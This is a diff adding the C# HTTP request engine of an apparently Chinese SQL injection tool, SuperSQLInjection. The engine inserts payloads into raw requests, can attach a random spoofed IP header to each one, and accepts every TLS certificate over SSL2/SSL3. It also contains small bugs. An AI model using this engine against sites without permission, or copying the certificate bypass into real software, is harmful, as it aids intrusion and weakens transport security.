+ Byte[] buffer = null;
+ FileStream fs_dir=null;
+ StreamReader reader = null;
+ try
+ {
+ fs_dir = new FileStream(path, FileMode.Open, FileAccess.Read);
+ BinaryReader br = new BinaryReader(fs_dir);
+ int len = (int)fs_dir.Length;
+
+ buffer = new byte[len];
+
+ int size = br.Read(buffer, 0, len);
+
+ reader.Read();
+
+ }
+ catch (Exception e)
+ {
+ Tools.SysLog("readFileToByte-error:读取文件内容发生错误!"+e.Message);
+ }finally
+ {
+ if (reader != null)
+ {
+ reader.Close();
+ }
+ if (fs_dir != null)
+ {
+ fs_dir.Close();
+ }
+ }
+ return buffer;
+
+ }
+ public static object c = "";
+ public static String error = "";
+ public static void AppendLogToFile(String path,String log)
+ {
+ //锁住,防止多线程引发错误
+ lock (c)
+ {
+ List list = new List();
+ FileStream fs_dir = null;
+ StreamWriter sw = null;
+ try
+ {
+ fs_dir = new FileStream(AppDomain.CurrentDomain.BaseDirectory + "/" + path, FileMode.Append, FileAccess.Write);
+
+ sw = new StreamWriter(fs_dir);
+
+ sw.WriteLine(log);
+
+ sw.Close();
+
+ fs_dir.Close();
+
+ }
+ catch (Exception e)
+ {
+ error = "文件操作发生异常!" + e.Message;
+ }
+ finally
+ {
+ if (sw != null)
+ {
+ sw.Close();
+ }
+ if (fs_dir != null)
+ {
+ fs_dir.Close();
+ }
+ }
+ }
+
+ }
+ }
+}
diff --git a/SuperSQLInjection/tools/http/HTTP.cs b/SuperSQLInjection/tools/http/HTTP.cs
new file mode 100644
index 0000000..16d87bd
--- /dev/null
+++ b/SuperSQLInjection/tools/http/HTTP.cs
@@ -0,0 +1,933 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+using tools;
+using System.Net;
+using System.Net.Sockets;
+using model;
+using System.IO.Compression;
+using System.IO;
+using System.Net.Security;
+using System.Text.RegularExpressions;
+using System.Threading;
+using System.Diagnostics;
+using System.Security.Authentication;
+using System.Security.Cryptography.X509Certificates;
+using SuperSQLInjection.bypass;
+using SuperSQLInjection.tools.http;
+using System.Runtime.Serialization.Formatters.Binary;
+
+namespace SuperSQLInjection.tools
+{
+ public class HTTP
+ {
+
+ public const char T = '\n';
+ public const String CT = "\r\n";
+ public const String AutoGetEncoding = "自动识别";
+ public const String DefaultEncoding = "UTF-8";
+ public const String CTRL = "\r\n\r\n";
+ public const String Content_Length_Str = "content-length: ";
+ public const String Content_Length_Str_M = "Content-Length: ";
+ public const String Content_Length = "content-length";
+ public const String Content_Encoding = "content-encoding";
+ public const String Transfer_Encoding = "transfer-encoding";
+ public const String Connection = "connection";
+ public const int WaitTime =10;
+ public static Main main = null;
+ public static long index = 0;
+
+ public static String getTemplate = "GET /mysql.jsp?id=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240\r\nAccept-Encoding: gzip, deflate\r\nHost: 127.0.0.1:8090\r\nConnection: Close\r\nCookie: JSESSIONID=2F6D5F1AC8C376FF0AB48A08282A6CED";
+ public static String postTemplate = "POST /search/index.htm HTTP/1.1\r\nReferer: http://www.shack2.org/\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip, deflate\r\nContent-Length: 5\r\nHost: www.shack2.org\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\nCookie: CNZZDATA4159773=cnzz_eid%3D217492251-1446476958-%26ntime%3D1447834260; bdshare_firstime=1446476958863\r\n\r\nkey=s";
+ public void initMain(Main m)
+ {
+ main = m;
+ }
+
+ /**
+ *
+ 发生异常尝试重连
+ *
+ */
+ public static ServerInfo sendRequestRetry(Boolean isSSL, int tryCount, String host, int port, String payload, String request, int timeout, String encoding, Boolean foward_302,Boolean redirectDoGet)
+ {
+ int count = 0;
+
+ ServerInfo server = new ServerInfo();
+ timeout = timeout * 1000;
+ while (true)
+ {
+ if (count >tryCount) break;
+
+ try
+ {
+ if (!isSSL)
+ {
+ server = sendHTTPRequest(count, host, port, payload, request, timeout, encoding, foward_302,redirectDoGet);
+ return server;
+ }
+ else
+ {
+
+ server = sendHTTPSRequest(count, host, port, payload, request, timeout, encoding, foward_302, redirectDoGet);
+ return server;
+
+ }
+ }
+ catch (Exception e)
+ {
+ Tools.SysLog("发包发生异常,正在重试----" + e.Message);
+ server.timeout = true;
+ continue;
+ }
+ finally
+ {
+ count++;
+ }
+
+ }
+ return server;
+
+ }
+
+ private static void checkContentLength(ref ServerInfo server,ref String request) {
+
+ //重新计算并设置Content-length
+ int sindex = request.IndexOf(CTRL);
+ server.reuqestHeader = request;
+ if (sindex != -1)
+ {
+ server.reuqestHeader = request.Substring(0, sindex);
+ server.reuqestBody = request.Substring(sindex + 4, request.Length - sindex - 4);
+ int contentLength = Encoding.UTF8.GetBytes(server.reuqestBody).Length;
+ String newContentLength = Content_Length_Str_M + contentLength;
+ //产生随机ip头
+ if (!String.IsNullOrEmpty(main.config.randIPToHeader))
+ {
+ request = request.Insert(sindex, "\r\n" + main.config.randIPToHeader + ": " + Tools.randIP());
+ }
+
+ if (request.IndexOf(Content_Length_Str_M) != -1)
+ {
+ request = Regex.Replace(request, Content_Length_Str_M + "\\d+", newContentLength);
+ }
+ else
+ {
+ request = request.Insert(sindex, "\r\n" + newContentLength);
+ }
+ }
+ else
+ {
+ //产生随机ip头
+ if (!String.IsNullOrEmpty(main.config.randIPToHeader))
+ {
+ request = request + "\r\n" + main.config.randIPToHeader + ": " + Tools.randIP();
+ }
+ request = Regex.Replace(request, Content_Length_Str + "\\d+", Content_Length_Str_M + "0");
+ request += CTRL;
+ }
+
+
+ }
+
+ private static void doHeader(ref ServerInfo server, ref String[] headers, ref String encoding)
+ {
+ try
+ {
+ for (int i = 0; i < headers.Length; i++)
+ {
+ if (i == 0)
+ {
+ String[] codesplit = headers[i].Split(' ');
+ if (codesplit.Length > 0)
+ {
+ String[] sh = headers[i].Split(' ');
+ if (sh.Length > 1) {
+ server.code = Tools.convertToInt(sh[1]);
+ }
+ }
+ else {
+ server.code = 0;
+ }
+ }
+ else
+ {
+ String[] kv = Regex.Split(headers[i], ": ");
+ String key = kv[0].ToLower();
+ if (!server.headers.ContainsKey(key))
+ {
+ //自动识别编码
+ if ("自动识别".Equals(encoding)) {
+ if ("content-type".Equals(key))
+ {
+ String hecnode = getHTMLEncoding(kv[1], "");
+ if (!String.IsNullOrEmpty(hecnode))
+ {
+ server.encoding = hecnode;
+ }
+ }
+ }
+
+ if (kv.Length > 1)
+ {
+ server.headers.Add(key, kv[1]);
+ }
+ else
+ {
+ server.headers.Add(key, "");
+ }
+ }
+ }
+ }
+ }
+ catch (Exception e) {
+ throw e;
+ }
+
+
+ }
+
+ private static ServerInfo sendHTTPRequest(int count, String host, int port, String payload, String request, int timeout, String encoding, Boolean foward_302,Boolean redirectDoGet)
+ {
+ Interlocked.Increment(ref HTTP.index);
+ String index = Thread.CurrentThread.Name+ Interlocked.Read(ref HTTP.index);
+ Stopwatch sw = new Stopwatch();
+ sw.Start();
+ ServerInfo server = new ServerInfo();
+ TcpClient clientSocket = null;
+ int sum = 0;
+ Boolean isupdateEncoding = false;
+ try
+ {
+ if (port > 0 && port <= 65556)
+ {
+
+ request = request.Replace(Main.setInjectStr, payload);
+ request = StringReplace.strReplaceCenter(main.config, request, main.replaceList);
+ //编码处理
+ server.request = request;
+ TimeOutSocket tos = new TimeOutSocket();
+ clientSocket = tos.Connect(host, port, timeout);
+ if (sw.ElapsedMilliseconds >= timeout)
+ {
+ return server;
+ }
+ clientSocket.SendTimeout = timeout - tos.useTime;
+ if (clientSocket.Connected)
+ {
+ checkContentLength(ref server, ref request);
+ server.request = request;
+
+ byte[] requestByte = Encoding.UTF8.GetBytes(request);
+ clientSocket.Client.Send(requestByte);
+ byte[] responseBody = new byte[1024 * 1000];
+ int len = 0;
+ //获取header头
+ String tmp = "";
+ StringBuilder sb = new StringBuilder();
+ clientSocket.ReceiveTimeout = timeout - (int)sw.ElapsedMilliseconds;
+ do
+ {
+ byte[] responseHeader = new byte[1];
+ len = clientSocket.Client.Receive(responseHeader, 1, SocketFlags.None);
+ if (len <= 0) {
+ Thread.Sleep(WaitTime);
+ }
+ if (len == 1)
+ {
+
+ char c = (char)responseHeader[0];
+ sb.Append(c);
+ if (c.Equals(T))
+ {
+ tmp = String.Concat(sb[sb.Length - 4], sb[sb.Length - 3], sb[sb.Length - 2], c);
+ }
+ }
+ } while (!tmp.Equals(CTRL) && sw.ElapsedMilliseconds < timeout);
+
+ server.header = sb.ToString().Replace(CTRL, "");
+ String[] headers = Regex.Split(server.header, CT);
+ if (headers != null && headers.Length > 0)
+ {
+ //处理header
+ doHeader(ref server, ref headers, ref encoding);
+ //302 301跳转
+ if ((server.code == 302 || server.code == 301) && foward_302)
+ {
+ StringBuilder rsb = new StringBuilder(server.request);
+ int urlStart = server.request.IndexOf(" ") + 1;
+ int urlEnd = server.request.IndexOf(" HTTP");
+ if (urlStart != -1 && urlEnd != -1)
+ {
+ String url = server.request.Substring(urlStart, urlEnd - urlStart);
+ rsb.Remove(urlStart, url.Length);
+ String location = server.headers["location"];
+ if (!server.headers["location"].StartsWith("/") && !server.headers["location"].StartsWith("http"))
+ {
+ location = Tools.getCurrentPath(url) + location;
+ }
+ location = location.Replace(" ", "%20");
+ rsb.Insert(urlStart, location);
+ String newReuqest = rsb.ToString();
+ if (server.request.StartsWith("POST") && redirectDoGet) {
+ rsb.Remove(0, 4);
+ rsb.Insert(0, "GET");
+ }
+ return sendHTTPRequest(count, host, port, payload, rsb.ToString(), timeout, encoding, false, redirectDoGet);
+ }
+
+ }
+
+
+ //根据请求头解析
+ if (server.headers.ContainsKey(Content_Length))
+ {
+ int length = int.Parse(server.headers[Content_Length]);
+
+ while (sum < length && sw.ElapsedMilliseconds < timeout)
+ {
+ int readsize = length - sum;
+ len = clientSocket.Client.Receive(responseBody, sum, readsize, SocketFlags.None);
+ if (len > 0)
+ {
+ sum += len;
+ }
+ if(len<=0&& sum < length) {
+ Thread.Sleep(WaitTime);
+ }
+ }
+ }
+ //解析chunked传输
+ else if (server.headers.ContainsKey(Transfer_Encoding))
+ {
+ //读取长度
+ int chunkedSize = 0;
+ byte[] chunkedByte = new byte[1];
+ //读取总长度
+ sum = 0;
+ do
+ {
+ String ctmp = "";
+ do
+ {
+ len = clientSocket.Client.Receive(chunkedByte, 1, SocketFlags.None);
+ if(len<=0) {
+ Thread.Sleep(WaitTime);
+ }
+ ctmp += Encoding.UTF8.GetString(chunkedByte);
+
+ } while ((ctmp.IndexOf(CT) == -1) && (sw.ElapsedMilliseconds < timeout));
+
+ chunkedSize = Tools.convertToIntBy16(ctmp.Replace(CT, ""));
+
+ //chunked的结束0\r\n\r\n是结束标志,单个chunked块\r\n结束
+ if (ctmp.Equals(CT))
+ {
+ continue;
+ }
+ if (chunkedSize == 0)
+ {
+ //结束了
+ break;
+ }
+ int onechunkLen = 0;
+ while (onechunkLen < chunkedSize && sw.ElapsedMilliseconds < timeout)
+ {
+ len = clientSocket.Client.Receive(responseBody, sum, chunkedSize - onechunkLen, SocketFlags.None);
+ if (len > 0)
+ {
+ onechunkLen += len;
+ sum += len;
+ }
+ if(len<=0&& onechunkLen < chunkedSize)
+ {
+ Thread.Sleep(WaitTime);
+ }
+ }
+
+ //判断
+ } while (sw.ElapsedMilliseconds < timeout);
+ }
+ //connection close方式或未知body长度
+ else
+ {
+ while (sw.ElapsedMilliseconds < timeout)
+ {
+ if (clientSocket.Client.Poll(timeout, SelectMode.SelectRead))
+ {
+ if (clientSocket.Available > 0)
+ {
+ len = clientSocket.Client.Receive(responseBody, sum, (1024 * 200) - sum, SocketFlags.None);
+ if (len > 0)
+ {
+ sum += len;
+ }
+ else
+ {
+ Thread.Sleep(WaitTime);
+ }
+ }
+ else
+ {
+ break;
+ }
+ }
+ }
+ }
+
+ //自动识别编码
+ if (AutoGetEncoding.Equals(encoding))
+ {
+ if (!String.IsNullOrEmpty(server.encoding))
+ {
+ encoding = server.encoding;//header找到编码
+ }
+ else {
+ encoding = DefaultEncoding;//默认一个编码
+ isupdateEncoding = true;//body找编码
+ }
+ Encoding encod = Encoding.GetEncoding(encoding);
+ getBody(ref server, ref responseBody, ref sum, ref encod, ref index);
+ //修正编码
+ if (isupdateEncoding)
+ {
+ String cEncoding = getHTMLEncoding("", server.body);
+ if (!String.IsNullOrEmpty(cEncoding))
+ {
+ server.encoding = cEncoding;//body找到编码
+ getBody(ref server, ref responseBody, ref sum, ref encod, ref index);
+ }
+
+ }
+ }
+ else {
+ //指定编码
+ Encoding encod = Encoding.GetEncoding(encoding);
+ getBody(ref server, ref responseBody, ref sum, ref encod, ref index);
+ }
+
+ }
+ }
+
+ }
+ }
+ catch (Exception e)
+ {
+ Exception ee = new Exception("HTTP发包错误!错误消息:" + e.Message + e.TargetSite.Name + "----发包编号:" + index);
+ throw ee;
+ }
+ finally
+ {
+ sw.Stop();
+ server.length = sum;
+ server.runTime = (int)sw.ElapsedMilliseconds;
+ if (clientSocket != null)
+ {
+ clientSocket.Close();
+ }
+
+ if (main.config.isOpenHTTPLog)
+ {
+ server.sleepTime = main.config.sendHTTPSleepTime;
+ Tools.sysHTTPLog(index, server);
+ main.Invoke(new Main.sendHTTPLogDelegate(main.sendHTTPLog), index, server, payload);
+ }
+ if (main.config.sendHTTPSleepTime > 0)
+ {
+ Thread.Sleep(main.config.sendHTTPSleepTime);
+ }
+ }
+ return server;
+
+ }
+
+
+ private static void getBody(ref ServerInfo server, ref byte[] responseBody, ref int sum, ref Encoding encod, ref String index) {
+ if (server.headers.ContainsKey(Content_Encoding))
+ {
+ if (server.headers[Content_Encoding].IndexOf("gzip") != -1)
+ {
+ server.body = unGzip(responseBody, sum, encod, index);
+ }
+ else if (server.headers[Content_Encoding].IndexOf("deflate") != -1)
+ {
+ server.body = unDeflate(responseBody, sum, encod, index);
+ }
+ else {
+ server.body = encod.GetString(responseBody, 0,sum);
+ }
+
+ }
+ else
+ {
+ server.body = encod.GetString(responseBody, 0, sum);
+ }
+ }
+
+ private static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
+ {
+ return true;
+ }
+ private static ServerInfo sendHTTPSRequest(int count, String host, int port, String payload, String request, int timeout, String encoding, Boolean foward_302,Boolean redirectDoGet)
+ {
+ Interlocked.Increment(ref HTTP.index);
+ String index = Thread.CurrentThread.Name + Interlocked.Read(ref HTTP.index);
+ Stopwatch sw = new Stopwatch();
+ sw.Start();
+ ServerInfo server = new ServerInfo();
+ Boolean isupdateEncoding = false;
+ int sum = 0;
+
+ TcpClient clientSocket = null; ;
+
+ try
+ {
+
+ if (port > 0 && port <= 65556)
+ {
+ request = request.Replace(Main.setInjectStr, payload);
+
+ //编码处理
+ request = StringReplace.strReplaceCenter(main.config, request, main.replaceList);
+
+ TimeOutSocket tos = new TimeOutSocket();
+ clientSocket = tos.Connect(host, port, timeout);
+ if (sw.ElapsedMilliseconds >= timeout)
+ {
+ return server;
+ }
+ clientSocket.SendTimeout = timeout - tos.useTime;
+
+ SslStream ssl = null;
+ if (clientSocket.Connected)
+ {
+ ssl = new SslStream(clientSocket.GetStream(), false, new RemoteCertificateValidationCallback(ValidateServerCertificate));
+ SslProtocols protocol = SslProtocols.Ssl3 | SslProtocols.Ssl2 | SslProtocols.Tls;
+ ssl.AuthenticateAsClient(host, null, protocol, false);
+ if (ssl.IsAuthenticated)
+ {
+ checkContentLength(ref server, ref request);
+ server.request = request;
+ byte[] requestByte = Encoding.UTF8.GetBytes(request);
+ ssl.Write(requestByte);
+ ssl.Flush();
+ }
+ }
+ server.request = request;
+ byte[] responseBody = new byte[1024 * 1000];
+ int len = 0;
+ //获取header头
+ String tmp = "";
+
+ StringBuilder sb = new StringBuilder();
+ StringBuilder bulider = new StringBuilder();
+ clientSocket.ReceiveTimeout = timeout - (int)sw.ElapsedMilliseconds;
+ do
+ {
+ byte[] responseHeader = new byte[1];
+ int read = ssl.ReadByte();
+ if (read <= 0)
+ {
+ Thread.Sleep(WaitTime);
+ }
+ char c = (char)read;
+ sb.Append(c);
+ if (c.Equals(T))
+ {
+ tmp = String.Concat(sb[sb.Length - 4], sb[sb.Length - 3], sb[sb.Length - 2], c);
+ }
+
+ } while (!tmp.Equals(CTRL) && sw.ElapsedMilliseconds < timeout);
+
+ server.header = sb.ToString().Replace(CTRL, "");
+ String[] headers = Regex.Split(server.header, CT);
+ //处理header
+ doHeader(ref server, ref headers,ref encoding);
+ //302 301跳转
+ if ((server.code == 302 || server.code == 301) && foward_302)
+ {
+
+ StringBuilder rsb = new StringBuilder(server.request);
+ int urlStart = server.request.IndexOf(" ") + 1;
+ int urlEnd = server.request.IndexOf(" HTTP");
+ if (urlStart != -1 && urlEnd != -1)
+ {
+ String url = server.request.Substring(urlStart, urlEnd - urlStart);
+ rsb.Remove(urlStart, url.Length);
+ String location = server.headers["location"];
+ if (!server.headers["location"].StartsWith("/") && !server.headers["location"].StartsWith("http"))
+ {
+ location = Tools.getCurrentPath(url) + location;
+ }
+ location = location.Replace(" ", "%20");
+ rsb.Insert(urlStart, location);
+ String newReuqest = rsb.ToString();
+ if (rsb.ToString().StartsWith("POST") && redirectDoGet)
+ {
+ rsb.Remove(0, 4);
+ rsb.Insert(0, "GET");
+ }
+
+ return sendHTTPSRequest(count, host, port, payload, rsb.ToString(), timeout, encoding, false, redirectDoGet);
+ }
+
+
+
+
+ }
+
+
+ //根据请求头解析
+ if (server.headers.ContainsKey(Content_Length))
+ {
+ int length = int.Parse(server.headers[Content_Length]);
+ while (sum < length && sw.ElapsedMilliseconds < timeout)
+ {
+ len = ssl.Read(responseBody, sum, length - sum);
+ if (len > 0)
+ {
+ sum += len;
+ }
+ if (len <= 0 && sum < length)
+ {
+ Thread.Sleep(WaitTime);
+ }
+ }
+ }
+ //解析chunked传输
+ else if (server.headers.ContainsKey(Transfer_Encoding))
+ {
+ //读取长度
+ int chunkedSize = 0;
+ byte[] chunkedByte = new byte[1];
+ //读取总长度
+ sum = 0;
+ do
+ {
+ String ctmp = "";
+ do
+ {
+ len = ssl.Read(chunkedByte, 0, 1);
+ if (len <= 0)
+ {
+ Thread.Sleep(WaitTime);
+ }
+ ctmp += Encoding.UTF8.GetString(chunkedByte);
+
+ } while (ctmp.IndexOf(CT) == -1 && sw.ElapsedMilliseconds < timeout);
+
+ chunkedSize = Tools.convertToIntBy16(ctmp.Replace(CT, ""));
+
+ //chunked的结束0\r\n\r\n是结束标志,单个chunked块\r\n结束
+ if (ctmp.Equals(CT))
+ {
+ continue;
+ }
+ if (chunkedSize == 0)
+ {
+ //结束了
+ break;
+ }
+ int onechunkLen = 0;
+
+ while (onechunkLen < chunkedSize && sw.ElapsedMilliseconds < timeout)
+ {
+ len = ssl.Read(responseBody, sum, chunkedSize - onechunkLen);
+ if (len > 0)
+ {
+ onechunkLen += len;
+ sum += len;
+ }
+ if (len <= 0 && onechunkLen < chunkedSize)
+ {
+ Thread.Sleep(WaitTime);
+ }
+ }
+
+ //判断
+ } while (sw.ElapsedMilliseconds < timeout);
+ }
+ //connection close方式或未知body长度
+ else
+ {
+ while (sw.ElapsedMilliseconds < timeout)
+ {
+ if (clientSocket.Client.Poll(timeout, SelectMode.SelectRead))
+ {
+ if (clientSocket.Available > 0)
+ {
+ len = ssl.Read(responseBody, sum, (1024 * 200) - sum);
+ if (len > 0)
+ {
+ sum += len;
+ }
+ else
+ {
+ Thread.Sleep(WaitTime);
+ }
+ }
+ else
+ {
+ break;
+ }
+ }
+ }
+ }
+ //自动识别编码
+ if (AutoGetEncoding.Equals(encoding))
+ {
+ if (!String.IsNullOrEmpty(server.encoding))
+ {
+ encoding = server.encoding;//header找到编码
+ }
+ else {
+ encoding = DefaultEncoding;//默认一个编码
+ isupdateEncoding = true;//body找编码
+ }
+ Encoding encod = Encoding.GetEncoding(encoding);
+ getBody(ref server, ref responseBody, ref sum, ref encod, ref index);
+ //修正编码
+ if (isupdateEncoding)
+ {
+ String cEncoding = getHTMLEncoding("", server.body);
+ if (!String.IsNullOrEmpty(cEncoding))
+ {
+ server.encoding = cEncoding;//body找到编码
+ getBody(ref server, ref responseBody, ref sum, ref encod, ref index);
+ }
+
+ }
+ }
+ else {
+ //指定编码
+ Encoding encod = Encoding.GetEncoding(encoding);
+ getBody(ref server, ref responseBody, ref sum, ref encod, ref index);
+ }
+ }
+
+ }
+ catch (Exception e)
+ {
+ Exception ee = new Exception("HTTPS发包错误!错误消息:" + e.Message + "----发包编号:" + index);
+ if (ee.Message.IndexOf("doHeader") != -1) {
+ String a=e.Message;
+ }
+ throw ee;
+ }
+ finally
+ {
+ sw.Stop();
+ server.length = sum;
+ server.runTime = (int)sw.ElapsedMilliseconds;
+
+ if (clientSocket != null)
+ {
+ clientSocket.Close();
+ }
+
+ if (main.config.isOpenHTTPLog)
+ {
+ server.sleepTime = main.config.sendHTTPSleepTime;
+ Tools.sysHTTPLog(index, server);
+ main.Invoke(new Main.sendHTTPLogDelegate(main.sendHTTPLog), index, server, payload);
+ }
+ if (main.config.sendHTTPSleepTime > 0)
+ {
+ Thread.Sleep(main.config.sendHTTPSleepTime);
+ }
+ }
+ return server;
+
+ }
+
+ public static String unGzip(byte[] data, int len, Encoding encoding,String index)
+ {
+
+ String str = "";
+ MemoryStream ms = new MemoryStream(data, 0, len);
+ GZipStream gs = new GZipStream(ms, CompressionMode.Decompress);
+ MemoryStream outbuf = new MemoryStream();
+ byte[] block = new byte[1024];
+
+ try
+ {
+ while (true)
+ {
+ int bytesRead = gs.Read(block, 0, block.Length);
+ if (bytesRead <= 0)
+ {
+ break;
+ }
+ else
+ {
+ outbuf.Write(block, 0, bytesRead);
+ }
+ }
+ str = encoding.GetString(outbuf.ToArray());
+ }
+ catch (Exception e)
+ {
+ Tools.SysLog("解压Gzip发生异常----" + e.Message+"----"+ index);
+
+ }
+ finally
+ {
+ outbuf.Close();
+ gs.Close();
+ ms.Close();
+
+ }
+ return str;
+
+ }
+
+ public static String unDeflate(byte[] data, int len, Encoding encoding, String index)
+ {
+
+ String str = "";
+ MemoryStream ms = new MemoryStream(data, 0, len);
+ DeflateStream ds = new DeflateStream(ms, CompressionMode.Decompress);
+ MemoryStream outbuf = new MemoryStream();
+ byte[] block = new byte[1024];
+
+ try
+ {
+ while (true)
+ {
+ int bytesRead = ds.Read(block, 0, block.Length);
+ if (bytesRead <= 0)
+ {
+ break;
+ }
+ else
+ {
+ outbuf.Write(block, 0, bytesRead);
+ }
+ }
+ str = encoding.GetString(outbuf.ToArray());
+ }
+ catch (Exception e)
+ {
+ Tools.SysLog("解压deflate发生异常----" + e.Message + "----" + index);
+
+ }
+ finally
+ {
+ outbuf.Close();
+ ds.Close();
+ ms.Close();
+
+ }
+ return str;
+
+ }
+
+
+ public String SetCookies(string sHtml, String sCookies)
+ {
+
+ //Set-Cookie: b_110128=0; domain=.qidian.com; expires=Fri, 15-Sep-2023 15:48:41 GMT; path=/
+
+ string sName = "";
+
+ string sValue = "";
+
+ MatchCollection mc;
+
+ Match m;
+
+ Regex r;
+
+ if (!sCookies.EndsWith(";") && sCookies != "")
+ {
+
+ sCookies += ";";
+
+ }
+
+ r = new Regex("Set-Cookie:\\s*(?.*?)=(?.*?);", RegexOptions.Compiled | RegexOptions.Singleline | RegexOptions.IgnoreCase);
+
+ mc = r.Matches(sHtml);
+
+ for (int i = 0; i < mc.Count; i++)
+ {
+
+ sName = mc[i].Groups["sName"].Value.Trim();
+
+ sValue = mc[i].Groups["sValue"].Value.Trim();
+
+ r = new Regex(sName + "\\s*=\\s*.*?;", RegexOptions.Compiled | RegexOptions.Singleline | RegexOptions.IgnoreCase);
+
+ m = r.Match(sCookies);
+
+ if (m.Success)
+ {
+
+ sCookies = sCookies.Replace(m.Value, sName + "=" + sValue + ";");
+
+ }
+
+ else
+ {
+
+ sCookies += sName + "=" + sValue + ";";
+
+ }
+
+ }
+
+ try
+ {
+
+ if (sCookies.StartsWith(";"))
+ {
+
+ sCookies = sCookies.Substring(1, sCookies.Length - 1);
+
+ }
+
+ }
+
+ catch
+ {
+
+ }
+ return sCookies;
+
+ }
+
+ public static String getHTMLEncoding(String header, String body)
+ {
+ if (String.IsNullOrEmpty(header)&& String.IsNullOrEmpty(body))
+ {
+ return "";
+ }
+ body = body.ToUpper();
+
+ String encode = "";
+ Match m = Regex.Match(header, @"charset=(?[\w\-]+)", RegexOptions.IgnoreCase);
+ if (m.Success)
+ {
+ encode=m.Groups["charset"].Value.ToUpper();
+ }
+ else
+ {
+ if (String.IsNullOrEmpty(body))
+ {
+ return "";
+ }
+ m = Regex.Match(body, @"charset=['""]{0,1}(?[\w\-]+)['""]{0,1}", RegexOptions.IgnoreCase);
+ if (m.Success)
+ {
+ encode=m.Groups["charset"].Value.ToUpper();
+ }
+ }
+ if ("UTF8".Equals(encode)) {
+ encode = "UTF-8";
+ }
+ return encode;
+
+
+ }
+ }
+}
\ No newline at end of file
diff --git a/SuperSQLInjection/tools/http/HTTPRequest.cs b/SuperSQLInjection/tools/http/HTTPRequest.cs
new file mode 100644
index 0000000..95409f1
--- /dev/null
+++ b/SuperSQLInjection/tools/http/HTTPRequest.cs
@@ -0,0 +1,135 @@
+using model;
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Net;
+using System.Text;
+using System.Text.RegularExpressions;
+using tools;
+
+namespace SuperSQLInjection.tools
+{
+ class HTTPRequest
+ {
+ public static ServerInfo getHtmlByPost(String url, String data,String referer,String cookies)
+ {
+ ServerInfo server = new ServerInfo();
+ HttpWebResponse response = null;
+ StreamReader sr = null;
+ HttpWebRequest request = null;
+
+ try
+ {
+ //设置模拟http访问参数
+ Uri uri = new Uri(url);
+ request = (HttpWebRequest)WebRequest.Create(uri);
+ request.Method = "POST";
+ request.UserAgent = "Mozilla/5.0";
+ request.ContentType = "application/x-www-form-urlencoded";
+ request.Timeout = 30000;
+ request.KeepAlive = true;
+ if (referer != null) {
+ request.Referer = referer;
+ }
+ request.AllowAutoRedirect = false;
+ if (!"".Equals(cookies))
+ {
+ request.Headers.Add("Cookie", cookies);
+ }
+ byte[] bydata = Encoding.ASCII.GetBytes(data);
+ request.ContentLength = bydata.Length;
+ Stream reqStream = request.GetRequestStream();
+ reqStream.Write(bydata, 0, bydata.Length);
+ reqStream.Close();
+ response = (HttpWebResponse)request.GetResponse();
+ CookieCollection cc = response.Cookies;
+ StreamReader str = new StreamReader(response.GetResponseStream());
+ server.body= str.ReadToEnd();
+ server.cookies = response.Headers["Set-Cookie"];
+ }
+ catch (Exception e)
+ {
+ Tools.SysLog(e.Message);
+ }
+ finally
+ {
+ if (sr != null)
+ {
+ sr.Close();
+ }
+ if (response != null)
+ {
+ response.Close();
+ }
+ if (request != null)
+ {
+ request.Abort();
+ }
+ }
+ return server;
+ }
+ public static String getHTMLEncoding(String header)
+ {
+
+ Match m = Regex.Match(header, "charset=\\S{0,8}\"");
+ if (m.Success)
+ {
+ return m.Groups[0].Value.Replace("charset=", "").Replace("\"", "");
+ }
+ return "";
+ }
+ public static ServerInfo getHtml(String url,String referer,String cookies)
+ {
+ ServerInfo server = new ServerInfo();
+ HttpWebResponse response = null;
+ StreamReader sr = null;
+ HttpWebRequest request = null;
+ try
+ {
+
+ //设置模拟http访问参数
+ Uri uri = new Uri(url);
+ request = (HttpWebRequest)WebRequest.Create(uri);
+ request.Accept = "*/*";
+ request.Method = "GET";
+ request.Timeout = 30000;
+ request.AllowAutoRedirect = false;
+ if (referer != null)
+ {
+ request.Referer = referer;
+ }
+ if (!"".Equals(cookies))
+ {
+ request.Headers.Add("Cookie", cookies);
+ }
+ response = (HttpWebResponse)request.GetResponse();
+ sr = new StreamReader(response.GetResponseStream(), Encoding.UTF8);
+
+ //读取服务器端返回的消息
+ server.body = sr.ReadToEnd();
+ server.cookies = response.Headers["Set-Cookie"];
+
+ }
+ catch (Exception e)
+ {
+ Tools.SysLog(e.Message);
+ }
+ finally
+ {
+ if (sr != null)
+ {
+ sr.Close();
+ }
+ if (response != null)
+ {
+ response.Close();
+ }
+ if (request != null)
+ {
+ request.Abort();
+ }
+ }
+ return server;
+ }
+ }
+}
diff --git a/SuperSQLInjection/tools/http/HttpTools.cs b/SuperSQLInjection/tools/http/HttpTools.cs
new file mode 100644
index 0000000..d7b883d
--- /dev/null
+++ b/SuperSQLInjection/tools/http/HttpTools.cs
@@ -0,0 +1,70 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+using System.Net;
+using System.IO;
+using System.Net.Sockets;
+using System.Text.RegularExpressions;
+using model;
+using System.Threading;
+
+namespace tools
+{
+
+ class HttpTools
+ {
+ public static String getHTMLEncoding(String header){
+
+ Match m=Regex.Match(header, "charset=\\S{0,8}\"");
+ if (m.Success) {
+ return m.Groups[0].Value.Replace("charset=","").Replace("\"","");
+ }
+ return "";
+ }
+ public static String getHtml(String url, int timeout)
+ {
+ String html = "";
+ HttpWebResponse response = null;
+ StreamReader sr = null;
+ HttpWebRequest request = null;
+ try
+ {
+
+ //设置模拟http访问参数
+ Uri uri = new Uri(url);
+ request = (HttpWebRequest)WebRequest.Create(uri);
+ request.Accept = "*/*";
+ request.Method = "GET";
+ request.Timeout = timeout * 1000;
+ request.AllowAutoRedirect = false;
+ response = (HttpWebResponse)request.GetResponse();
+ sr = new StreamReader(response.GetResponseStream(), Encoding.UTF8);
+
+ //读取服务器端返回的消息
+ html = sr.ReadToEnd();
+
+ }
